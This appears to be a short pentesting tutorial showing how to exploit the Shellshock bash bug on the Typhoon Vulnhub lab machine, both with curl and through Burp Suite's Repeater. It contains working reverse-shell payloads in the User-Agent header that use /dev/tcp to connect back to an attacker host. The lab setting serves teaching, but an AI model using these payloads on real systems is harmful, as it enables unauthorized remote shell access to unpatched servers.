In this tutorial I show you to exploit the infamous shellshock vulnerabilty. I will cover how to do so without Metasploit and how to do it using Burp Suite.
Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.
Table of Contents
What Is The Shellshock Vulnerability?
Data from web requests is not properly handled in CGI web server technology and so bash incorrectly executes trailing commands when a specially crafted request is sent.
What You Need
- Typhoon 1.02 Vulnhub Machine – VirtualBox
- Kali Linux Virtual Machine – VirtualBox
Recon
Using nikto I enumerate the known vulnerabilities on the target’s web server.
So it says the target is likely vulnerable to the shellshock vulnerability. I am going to use the following command to exploit.
Exploit The Shellshock Vulnerabilty
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.250/1234 0>&1' http://10.0.0.190/cgi-bin/test.shUsing a specially crafted bash one-liner reverse shell I can exploit the shellshock vulnerability to get a shell back.
Exploit Shellshock Using Burp
You have undoubtedly read through my tutorial for setting up Burp the easy way and that means you are only one click away from being ready for the next step.
Look closely at the image below and see what I have done.
I turn on the FoxyProxy proxy as shown in my tutorial I just mentioned. Next I open http://typhoon-ip/cgi-bin/test.sh as you remember from the nikto scan results, and open up Burp Suite.
I am then sending the request to Repeater by using (ctrl + r) and now I am posed to alter the request before sending it on.
After the User-Agent field I have put in the bash one-liner reverse shell to be executed on the target.
User-Agent: () { :; };/bin/bash -i >& /dev/tcp/10.0.0.2/1234 0>&1
So that is how you exploit the shellshock vulnerability using burp suite in this case we are using the Typhoon vulnhub machine to test our exploit on.